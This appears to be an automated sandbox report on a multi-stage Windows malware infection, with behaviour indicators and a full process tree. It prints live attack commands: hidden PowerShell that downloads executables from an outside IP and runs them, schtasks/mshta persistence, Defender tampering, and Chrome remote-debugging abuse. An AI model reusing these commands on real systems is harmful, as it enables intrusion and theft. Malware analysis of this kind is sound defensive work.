040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 2d2018b2b5.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2864 schtasks.exe 1792 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 2348 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe 2680 skotes.exe 1748 KsqTMuf.exe 1748 KsqTMuf.exe 1748 KsqTMuf.exe 1748 KsqTMuf.exe 2876 lFlj2tl.exe 1672 powershell.exe 1672 powershell.exe 1672 powershell.exe 2876 lFlj2tl.exe 1452 TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE 2128 powershell.exe 2308 powershell.exe 2636 powershell.exe 2876 lFlj2tl.exe 2556 chrome.exe 2556 chrome.exe 1452 TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE 1452 TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE 1652 powershell.exe 1368 NthMhDa.exe 1228 Gxtuum.exe 1652 powershell.exe 1652 powershell.exe 1652 powershell.exe 2876 lFlj2tl.exe 2876 lFlj2tl.exe 3124 483d2fa8a0d53818306efeb32d3.exe 3780 GKjci28.exe 3780 GKjci28.exe 3780 GKjci28.exe 3780 GKjci28.exe 3780 GKjci28.exe 1188 inet.exe 2876 lFlj2tl.exe 2592 uxek.exe 1644 ada8778c42.exe 3492 6ab70434ce.exe 2908 4c45c2eaab.exe 2908 4c45c2eaab.exe 2908 4c45c2eaab.exe 2908 4c45c2eaab.exe 2908 4c45c2eaab.exe 3516 KsqTMuf.exe 3516 KsqTMuf.exe 3516 KsqTMuf.exe 3516 KsqTMuf.exe 2428 NthMhDa.exe 268 GKjci28.exe 268 GKjci28.exe 268 GKjci28.exe 268 GKjci28.exe 268 GKjci28.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe Token: SeDebugPrivilege 1452 TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE Token: SeDebugPrivilege 1652 powershell.exe Token: SeShutdownPrivilege 2556 chrome.exe Token: SeShutdownPrivilege 2556 chrome.exe Token: SeShutdownPrivilege 2556 chrome.exe Token: SeShutdownPrivilege 2556 chrome.exe Token: SeShutdownPrivilege 2556 chrome.exe Token: SeShutdownPrivilege 2556 chrome.exe Token: SeShutdownPrivilege 2556 chrome.exe Token: SeShutdownPrivilege 2556 chrome.exe Token: SeShutdownPrivilege 2556 chrome.exe Token: SeShutdownPrivilege 2556 chrome.exe Token: SeShutdownPrivilege 2556 chrome.exe Token: SeShutdownPrivilege 2556 chrome.exe -
Suspicious use of FindShellTrayWindow 39 IoCs
pid Process 2348 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe 1556 f87af9d1cb.exe 1556 f87af9d1cb.exe 1556 f87af9d1cb.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 2556 chrome.exe 1368 NthMhDa.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1556 f87af9d1cb.exe 1556 f87af9d1cb.exe 1556 f87af9d1cb.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2348 wrote to memory of 2680 2348 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe 30 PID 2348 wrote to memory of 2680 2348 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe 30 PID 2348 wrote to memory of 2680 2348 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe 30 PID 2348 wrote to memory of 2680 2348 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe 30 PID 2680 wrote to memory of 1472 2680 skotes.exe 33 PID 2680 wrote to memory of 1472 2680 skotes.exe 33 PID 2680 wrote to memory of 1472 2680 skotes.exe 33 PID 2680 wrote to memory of 1472 2680 skotes.exe 33 PID 2680 wrote to memory of 1452 2680 skotes.exe 34 PID 2680 wrote to memory of 1452 2680 skotes.exe 34 PID 2680 wrote to memory of 1452 2680 skotes.exe 34 PID 2680 wrote to memory of 1452 2680 skotes.exe 34 PID 1452 wrote to memory of 1748 1452 KsqTMuf.exe 36 PID 1452 wrote to memory of 1748 1452 KsqTMuf.exe 36 PID 1452 wrote to memory of 1748 1452 KsqTMuf.exe 36 PID 1452 wrote to memory of 1748 1452 KsqTMuf.exe 36 PID 1452 wrote to memory of 1748 1452 KsqTMuf.exe 36 PID 1452 wrote to memory of 1748 1452 KsqTMuf.exe 36 PID 1452 wrote to memory of 1748 1452 KsqTMuf.exe 36 PID 1452 wrote to memory of 1748 1452 KsqTMuf.exe 36 PID 1452 wrote to memory of 1748 1452 KsqTMuf.exe 36 PID 1452 wrote to memory of 1748 1452 KsqTMuf.exe 36 PID 1452 wrote to memory of 2972 1452 KsqTMuf.exe 37 PID 1452 wrote to memory of 2972 1452 KsqTMuf.exe 37 PID 1452 wrote to memory of 2972 1452 KsqTMuf.exe 37 PID 1452 wrote to memory of 2972 1452 KsqTMuf.exe 37 PID 2680 wrote to memory of 2876 2680 skotes.exe 39 PID 2680 wrote to memory of 2876 2680 skotes.exe 39 PID 2680 wrote to memory of 2876 2680 skotes.exe 39 PID 2680 wrote to memory of 2876 2680 skotes.exe 39 PID 2680 wrote to memory of 1556 2680 skotes.exe 40 PID 2680 wrote to memory of 1556 2680 skotes.exe 40 PID 2680 wrote to memory of 1556 2680 skotes.exe 40 PID 2680 wrote to memory of 1556 2680 skotes.exe 40 PID 1556 wrote to memory of 2000 1556 f87af9d1cb.exe 41 PID 1556 wrote to memory of 2000 1556 f87af9d1cb.exe 41 PID 1556 wrote to memory of 2000 1556 f87af9d1cb.exe 41 PID 1556 wrote to memory of 2000 1556 f87af9d1cb.exe 41 PID 1556 wrote to memory of 2012 1556 f87af9d1cb.exe 42 PID 1556 wrote to memory of 2012 1556 f87af9d1cb.exe 42 PID 1556 wrote to memory of 2012 1556 f87af9d1cb.exe 42 PID 1556 wrote to memory of 2012 1556 f87af9d1cb.exe 42 PID 2000 wrote to memory of 2864 2000 cmd.exe 44 PID 2000 wrote to memory of 2864 2000 cmd.exe 44 PID 2000 wrote to memory of 2864 2000 cmd.exe 44 PID 2000 wrote to memory of 2864 2000 cmd.exe 44 PID 2012 wrote to memory of 1672 2012 mshta.exe 45 PID 2012 wrote to memory of 1672 2012 mshta.exe 45 PID 2012 wrote to memory of 1672 2012 mshta.exe 45 PID 2012 wrote to memory of 1672 2012 mshta.exe 45 PID 2680 wrote to memory of 1372 2680 skotes.exe 48 PID 2680 wrote to memory of 1372 2680 skotes.exe 48 PID 2680 wrote to memory of 1372 2680 skotes.exe 48 PID 2680 wrote to memory of 1372 2680 skotes.exe 48 PID 1372 wrote to memory of 2920 1372 cmd.exe 50 PID 1372 wrote to memory of 2920 1372 cmd.exe 50 PID 1372 wrote to memory of 2920 1372 cmd.exe 50 PID 1372 wrote to memory of 2920 1372 cmd.exe 50 PID 2920 wrote to memory of 1516 2920 cmd.exe 52 PID 2920 wrote to memory of 1516 2920 cmd.exe 52 PID 2920 wrote to memory of 1516 2920 cmd.exe 52 PID 2920 wrote to memory of 1516 2920 cmd.exe 52 PID 1672 wrote to memory of 1452 1672 powershell.exe 53 PID 1672 wrote to memory of 1452 1672 powershell.exe 53
Processes
-
C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"3⤵
- Executes dropped EXE
PID:1472
-
-
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 684⤵
- Loads dropped DLL
- Program crash
PID:2972
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2876 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2556 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6849758,0x7fef6849768,0x7fef68497785⤵PID:2196
-
-
C:\Windows\system32\ctfmon.exectfmon.exe5⤵PID:824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:25⤵PID:2968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:85⤵PID:1704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1464 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:85⤵PID:1948
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1868 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:2572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2088 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:2956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2452 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:25⤵PID:2104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1300 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:15⤵
- Uses browser remote debugging
PID:2780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3516 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:85⤵PID:1956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:85⤵PID:2060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:85⤵PID:2772
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ym7yu" & exit4⤵
- System Location Discovery: System Language Discovery
PID:268 -
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2072
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe"C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2864
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE"C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
PID:1944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "6fLQXma4qrZ" /tr "mshta \"C:\Temp\My6dz0IVO.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1792
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\My6dz0IVO.hta"5⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3124
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1368 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1228 -
C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3780
-
-
C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe"C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1644 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2444
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe"C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3492 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:624
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe"C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2908
-
-
